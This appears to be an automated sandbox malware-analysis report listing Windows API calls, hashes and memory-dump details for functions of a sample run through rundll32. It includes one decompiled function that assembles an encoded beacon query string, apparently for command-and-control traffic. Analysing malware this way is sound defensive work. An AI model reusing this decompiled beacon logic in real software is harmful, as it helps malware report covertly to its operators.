                                                          • Instruction Fuzzy Hash: 6121B6329042049FCB14EF68DCC19ABB7A5FF44350B0589A9ED55AB245DB30FD29C7E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558CDB9, Relevance: 51.4, APIs: 34, Instructions: 399synchronizationtimethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0559209C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 055920D0
                                                            • Part of subcall function 0559209C: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05592191
                                                            • Part of subcall function 0559209C: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 0559219A
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 0558CE57
                                                            • Part of subcall function 05581DB7: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05581DD1
                                                            • Part of subcall function 05581DB7: CreateWaitableTimerA.KERNEL32(0559C1A8,00000001,?), ref: 05581DEE
                                                            • Part of subcall function 05581DB7: GetLastError.KERNEL32(?,00000000,05587801,00000000,00000000,00008008,?,?,00000000,00000000,?,00000001,055963D8,00000002,?,?), ref: 05581DFF
                                                            • Part of subcall function 05581DB7: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E3F
                                                            • Part of subcall function 05581DB7: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E5E
                                                            • Part of subcall function 05581DB7: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E74
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 0558CEBA
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0558CF37
                                                          • WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 0558CFDC
                                                            • Part of subcall function 0558B922: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 0558B944
                                                            • Part of subcall function 0558B922: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?), ref: 0558B972
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D011
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D020
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0558D04D
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0558D067
                                                          • _allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 0558D0AF
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF,00000000), ref: 0558D0C9
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0558D0DF
                                                          • ReleaseMutex.KERNEL32(?), ref: 0558D0FC
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D10D
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D11C
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0558D150
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0558D16A
                                                          • SwitchToThread.KERNEL32 ref: 0558D16C
                                                          • ReleaseMutex.KERNEL32(?), ref: 0558D176
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D1B4
                                                            • Part of subcall function 0558FA96: RegOpenKeyA.ADVAPI32(80000001,?,7519F710), ref: 0558FAB4
                                                            • Part of subcall function 0558FA96: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0558FAE2
                                                            • Part of subcall function 0558FA96: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0558FAF4
                                                            • Part of subcall function 0558FA96: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0558FB19
                                                            • Part of subcall function 0558FA96: HeapFree.KERNEL32(00000000,00000000), ref: 0558FB34
                                                            • Part of subcall function 0558FA96: RegCloseKey.ADVAPI32(?), ref: 0558FB3E
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D1BF
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0558D1E2
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0558D1FC
                                                          • SwitchToThread.KERNEL32 ref: 0558D1FE
                                                          • ReleaseMutex.KERNEL32(?), ref: 0558D208
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0558D21D
                                                          • CloseHandle.KERNEL32(?), ref: 0558D26B
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D27F
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D28B
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D297
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D2A3
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D2AF
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D2BB
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0558D2C7
                                                          • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0558D2D6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$HeapMultipleObjects$MutexRelease_allmul$FreeThread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemUser
                                                          • String ID:
                                                          • API String ID: 3804754466-0
                                                          • Opcode ID: 3010cb77f682a488b5734782d7acf0a369482b99ff17f7419b0d5fc7498fe420
                                                          • Instruction ID: 33b646b57ceba7626ee61ef78674e79ad8979413be91909edaecb521575d2b2c
                                                          • Opcode Fuzzy Hash: 3010cb77f682a488b5734782d7acf0a369482b99ff17f7419b0d5fc7498fe420
                                                          • Instruction Fuzzy Hash: 27E1A271518305AFDB11BFA4DC85D7ABBF9FB84360F010A2EF595A21A0EB35DC089B52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05581939, Relevance: 39.3, APIs: 26, Instructions: 257memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 0558195A
                                                          • GetTickCount.KERNEL32 ref: 05581974
                                                          • wsprintfA.USER32 ref: 055819C7
                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 055819D3
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 055819DE
                                                          • _aulldiv.NTDLL(?,?,?,?), ref: 055819F4
                                                          • wsprintfA.USER32 ref: 05581A0A
                                                          • wsprintfA.USER32 ref: 05581A28
                                                          • wsprintfA.USER32 ref: 05581A3F
                                                          • wsprintfA.USER32 ref: 05581A60
                                                          • wsprintfA.USER32 ref: 05581A9B
                                                          • wsprintfA.USER32 ref: 05581ABF
                                                          • lstrcat.KERNEL32(?,?), ref: 05581AF7
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05581B11
                                                          • GetTickCount.KERNEL32 ref: 05581B21
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 05581B35
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05581B53
                                                          • StrTrimA.SHLWAPI(00000000,055963D8,00000000,059BB188), ref: 05581B88
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05581BA8
                                                          • lstrcat.KERNEL32(00000000,?), ref: 05581BB3
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 05581BB7
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 05581C38
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05581C47
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,059BB188), ref: 05581C56
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05581C68
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05581C7A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
                                                          • String ID:
                                                          • API String ID: 2878544442-0
                                                          • Opcode ID: d85477b50f7aeb57ffa2497d5c1432e15e888834737add741f0659caf94eac32
                                                          • Instruction ID: a95895d32a0502f62c7870b3698e797eb22ee0cccebde42299a489c0b929bead
                                                          • Opcode Fuzzy Hash: d85477b50f7aeb57ffa2497d5c1432e15e888834737add741f0659caf94eac32
                                                          • Instruction Fuzzy Hash: 8CA15A71614206EFDB01DFA9EC8AE6A7BE8FB48214F064416F548D7250DB38E819EB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05582AE8, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 390memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000000,?,?), ref: 05582B4A
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05582BE6
                                                          • lstrcpyn.KERNEL32(00000000,?,?), ref: 05582BFB
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05582C16
                                                          • StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,00000000,?,?,?), ref: 05582D00
                                                          • StrChrA.SHLWAPI(00000001,00000020), ref: 05582D11
                                                          • lstrlen.KERNEL32(00000000), ref: 05582D25
                                                          • memmove.NTDLL(?,?,00000001), ref: 05582D35
                                                          • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 05582D61
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05582D87
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05582D9B
                                                          • memcpy.NTDLL(?,?,?), ref: 05582DBB
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05582DF7
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05582EBD
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05582F05
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                                          • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                                          • API String ID: 3227826163-647159250
                                                          • Opcode ID: 1eb73a44b733b2f448e5c0d7a17e5e704758d14010d7c255c360d85902777aff
                                                          • Instruction ID: b789c0ce4ceb29ced5585faca7d7e8ca0a6dc692b9d423dcec811fd1dcf73403
                                                          • Opcode Fuzzy Hash: 1eb73a44b733b2f448e5c0d7a17e5e704758d14010d7c255c360d85902777aff
                                                          • Instruction Fuzzy Hash: 3EE18A75A00206EFDB14EFA8C889BBA7FB9FF04310F144559F816AB290DB34E955DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05574C7A, Relevance: 33.3, APIs: 22, Instructions: 276memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 05574CAD
                                                          • wsprintfA.USER32 ref: 05574D12
                                                          • wsprintfA.USER32 ref: 05574D58
                                                          • wsprintfA.USER32 ref: 05574D79
                                                          • lstrcat.KERNEL32(00000000,?), ref: 05574DB0
                                                          • wsprintfA.USER32 ref: 05574DCC
                                                          • wsprintfA.USER32 ref: 05574DE2
                                                          • wsprintfA.USER32 ref: 05574E02
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05574E1F
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 05574E40
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05574E5A
                                                            • Part of subcall function 055756B8: lstrlen.KERNEL32(00000000,751881D0,?,00000000,00000000,?,?,05581B69,00000000,059BB188), ref: 055756E3
                                                            • Part of subcall function 055756B8: lstrlen.KERNEL32(?,?,?,05581B69,00000000,059BB188), ref: 055756EB
                                                            • Part of subcall function 055756B8: strcpy.NTDLL ref: 05575702
                                                            • Part of subcall function 055756B8: lstrcat.KERNEL32(00000000,?), ref: 0557570D
                                                            • Part of subcall function 055756B8: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,05581B69,00000000,059BB188), ref: 0557572A
                                                          • StrTrimA.SHLWAPI(00000000,055963D8,00000000,059BB188), ref: 05574E8C
                                                            • Part of subcall function 05575995: lstrlen.KERNEL32(059B9986,00000000,751881D0,00000000,05581B94,00000000), ref: 055759A5
                                                            • Part of subcall function 05575995: lstrlen.KERNEL32(?), ref: 055759AD
                                                            • Part of subcall function 05575995: lstrcpy.KERNEL32(00000000,059B9986), ref: 055759C1
                                                            • Part of subcall function 05575995: lstrcat.KERNEL32(00000000,?), ref: 055759CC
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 05574EB0
                                                          • lstrcat.KERNEL32(?,?), ref: 05574EBE
                                                          • lstrcat.KERNEL32(?,00000000), ref: 05574EC5
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 05574ED0
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05574EEC
                                                            • Part of subcall function 05590190: memcpy.NTDLL(?,?,00000010), ref: 055901E1
                                                            • Part of subcall function 05590190: memcpy.NTDLL(00000000,?,?,00000010), ref: 05590274
                                                          • HeapFree.KERNEL32(00000000,?,00000001,059BB188,?,?,?), ref: 05574FBA
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05574FC9
                                                          • HeapFree.KERNEL32(00000000,?,00000000,059BB188), ref: 05574FDB
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05574FED
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05574FFC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpymemcpy$strcpy
                                                          • String ID:
                                                          • API String ID: 2173832509-0
                                                          • Opcode ID: bb936e034dbcedca71da2399aa43453ce2197faebc28e6902bb73bae7ad888d7
                                                          • Instruction ID: da802a534590c89272176a4e9b7d63139bfcdec94895d4fbb78bd0429c132dd8
                                                          • Opcode Fuzzy Hash: bb936e034dbcedca71da2399aa43453ce2197faebc28e6902bb73bae7ad888d7
                                                          • Instruction Fuzzy Hash: 46A1BF71518209EFDB01DFA8EC86E1ABBE8FB88314F064516F559D7260DB38E908EF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5254C, Relevance: 33.3, APIs: 22, Instructions: 262memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E00E5254C(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0xe5a018; // 0x94cfb54a
				asm("bswap eax");
				_t65 =  *0xe5a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0xe5a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0xe5a00c; // 0x69ab8210
				asm("bswap eax");
				_t68 =  *0xe5a2d4; // 0x435d5a8
				_t3 = _t68 + 0xe5b622; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d163, _t67, _t66, _t65, _t64,  *0xe5a02c,  *0xe5a004, _t63);
				_t71 = E00E56A9F();
				_t72 =  *0xe5a2d4; // 0x435d5a8
				_t4 = _t72 + 0xe5b662; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0xe5a2d4; // 0x435d5a8
					_t8 = _t139 + 0xe5b66d; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E00E52C60(_t144);
				_t77 =  *0xe5a2d4; // 0x435d5a8
				_t10 = _t77 + 0xe5b38a; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0xe5a2d4; // 0x435d5a8
				_t12 = _t81 + 0xe5b7b4; // 0x51b8d5c
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0xe5b33b; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0xe5a31c; // 0x51b95e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0xe5a2d4; // 0x435d5a8
					_t18 = _t135 + 0xe5b8e9; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0xe5a32c; // 0x51b95b0
				if(_t86 != 0) {
					_t132 =  *0xe5a2d4; // 0x435d5a8
					_t20 = _t132 + 0xe5b685; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0xe5a37c; // 0x51b9630
				_t88 = E00E53A66(0xe5a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0xe5a290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0xe5a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0xe5a290, _t167, _v12);
						goto L28;
					}
					E00E52C46(GetTickCount());
					_t95 =  *0xe5a37c; // 0x51b9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0xe5a37c; // 0x51b9630
					__imp__(_t99 + 0x40);
					_t101 =  *0xe5a37c; // 0x51b9630
					_t163 = E00E57156(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0xe5a290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0xe592ac);
					_push(_t163);
					_t107 = E00E55C8D();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0xe5a290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E00E53FC1( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E00E53546();
						L24:
						HeapFree( *0xe5a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E00E558A0(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E00E5627E(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E00E513CC(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E00E537F6(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00E513CC(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}


























































                                                          0x00e5254c
                                                          0x00e5254c
                                                          0x00e5254c
                                                          0x00e52555
                                                          0x00e5255a
                                                          0x00e52561
                                                          0x00e52563
                                                          0x00e52563
                                                          0x00e52570
                                                          0x00e5257b
                                                          0x00e5257e
                                                          0x00e52589
                                                          0x00e5258c
                                                          0x00e52591
                                                          0x00e52594
                                                          0x00e52599
                                                          0x00e5259c
                                                          0x00e525a8
                                                          0x00e525b5
                                                          0x00e525b7
                                                          0x00e525bd
                                                          0x00e525c2
                                                          0x00e525cd
                                                          0x00e525cf
                                                          0x00e525d2
                                                          0x00e525d8
                                                          0x00e525da
                                                          0x00e525e2
                                                          0x00e525ed
                                                          0x00e525ef
                                                          0x00e525f2
                                                          0x00e525f2
                                                          0x00e525f4
                                                          0x00e525fb
                                                          0x00e52600
                                                          0x00e5260d
                                                          0x00e5260f
                                                          0x00e52614
                                                          0x00e5261c
                                                          0x00e5261f
                                                          0x00e52625
                                                          0x00e52630
                                                          0x00e52632
                                                          0x00e52637
                                                          0x00e5263c
                                                          0x00e5263f
                                                          0x00e52644
                                                          0x00e5264f
                                                          0x00e52651
                                                          0x00e52654
                                                          0x00e52654
                                                          0x00e52656
                                                          0x00e5265d
                                                          0x00e52660
                                                          0x00e52665
                                                          0x00e5266f
                                                          0x00e52671
                                                          0x00e52671
                                                          0x00e52674
                                                          0x00e52682
                                                          0x00e52687
                                                          0x00e5268b
                                                          0x00e5268e
                                                          0x00e52858
                                                          0x00e52860
                                                          0x00e5286d
                                                          0x00e52694
                                                          0x00e526a0
                                                          0x00e526a8
                                                          0x00e526ab
                                                          0x00e52848
                                                          0x00e52852
                                                          0x00000000
                                                          0x00e52852
                                                          0x00e526b7
                                                          0x00e526bc
                                                          0x00e526c5
                                                          0x00e526d6
                                                          0x00e526da
                                                          0x00e526e3
                                                          0x00e526e9
                                                          0x00e526f6
                                                          0x00e526fd
                                                          0x00e52706
                                                          0x00e5270c
                                                          0x00e52838
                                                          0x00e52842
                                                          0x00000000
                                                          0x00e52842
                                                          0x00e52718
                                                          0x00e5271e
                                                          0x00e5271f
                                                          0x00e52726
                                                          0x00e52729
                                                          0x00e5282a
                                                          0x00e52832
                                                          0x00000000
                                                          0x00e52832
                                                          0x00e52732
                                                          0x00e52738
                                                          0x00e52741
                                                          0x00e5274a
                                                          0x00e52755
                                                          0x00e5275c
                                                          0x00e5275f
                                                          0x00e52870
                                                          0x00e52812
                                                          0x00e52812
                                                          0x00e52817
                                                          0x00e52822
                                                          0x00e52828
                                                          0x00000000
                                                          0x00e52828
                                                          0x00e52769
                                                          0x00e52770
                                                          0x00e52773
                                                          0x00e52778
                                                          0x00e52788
                                                          0x00e5278b
                                                          0x00e52791
                                                          0x00e52797
                                                          0x00e5279d
                                                          0x00e527a0
                                                          0x00e527a6
                                                          0x00e527a9
                                                          0x00e527ae
                                                          0x00e527b2
                                                          0x00e527b2
                                                          0x00e527be
                                                          0x00e527ca
                                                          0x00e527ce
                                                          0x00e527d0
                                                          0x00e527d5
                                                          0x00e527d7
                                                          0x00e527dc
                                                          0x00e527e1
                                                          0x00e527ee
                                                          0x00e527f6
                                                          0x00e527f9
                                                          0x00e527f9
                                                          0x00e527d5
                                                          0x00000000
                                                          0x00e527c0
                                                          0x00e527c4
                                                          0x00e527fb
                                                          0x00e527fe
                                                          0x00e52807
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e52807
                                                          0x00e527c6
                                                          0x00000000
                                                          0x00e527c6
                                                          0x00e527be

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00E52563
                                                          • wsprintfA.USER32 ref: 00E525B0
                                                          • wsprintfA.USER32 ref: 00E525CD
                                                          • wsprintfA.USER32 ref: 00E525ED
                                                          • wsprintfA.USER32 ref: 00E5260B
                                                          • wsprintfA.USER32 ref: 00E5262E
                                                          • wsprintfA.USER32 ref: 00E5264F
                                                          • wsprintfA.USER32 ref: 00E5266F
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00E526A0
                                                          • GetTickCount.KERNEL32 ref: 00E526B1
                                                          • RtlEnterCriticalSection.NTDLL(051B95F0), ref: 00E526C5
                                                          • RtlLeaveCriticalSection.NTDLL(051B95F0), ref: 00E526E3
                                                            • Part of subcall function 00E57156: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57181
                                                            • Part of subcall function 00E57156: lstrlen.KERNEL32(00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57189
                                                            • Part of subcall function 00E57156: strcpy.NTDLL ref: 00E571A0
                                                            • Part of subcall function 00E57156: lstrcat.KERNEL32(00000000,00000000), ref: 00E571AB
                                                            • Part of subcall function 00E57156: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E571C8
                                                          • StrTrimA.SHLWAPI(00000000,00E592AC,?,051B9630), ref: 00E52718
                                                            • Part of subcall function 00E55C8D: lstrlen.KERNEL32(051B887A,00000000,00000000,00000000,00E54AC6,00000000), ref: 00E55C9D
                                                            • Part of subcall function 00E55C8D: lstrlen.KERNEL32(?), ref: 00E55CA5
                                                            • Part of subcall function 00E55C8D: lstrcpy.KERNEL32(00000000,051B887A), ref: 00E55CB9
                                                            • Part of subcall function 00E55C8D: lstrcat.KERNEL32(00000000,?), ref: 00E55CC4
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 00E52738
                                                          • lstrcat.KERNEL32(00000000,?), ref: 00E5274A
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E52750
                                                            • Part of subcall function 00E53FC1: lstrlen.KERNEL32(?,00000000,051B9CD0,74ECC740,00E535B6,051B9ED5,?,KE,?,KE,?,69B25F44,E8FA7DD7,00000000), ref: 00E53FC8
                                                            • Part of subcall function 00E53FC1: mbstowcs.NTDLL ref: 00E53FF1
                                                            • Part of subcall function 00E53FC1: memset.NTDLL ref: 00E54003
                                                          • wcstombs.NTDLL ref: 00E527E1
                                                            • Part of subcall function 00E5627E: SysAllocString.OLEAUT32(00000000), ref: 00E562BF
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 00E52822
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00E52832
                                                          • HeapFree.KERNEL32(00000000,00000000,?,051B9630), ref: 00E52842
                                                          • HeapFree.KERNEL32(00000000,?), ref: 00E52852
                                                          • HeapFree.KERNEL32(00000000,?), ref: 00E52860
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
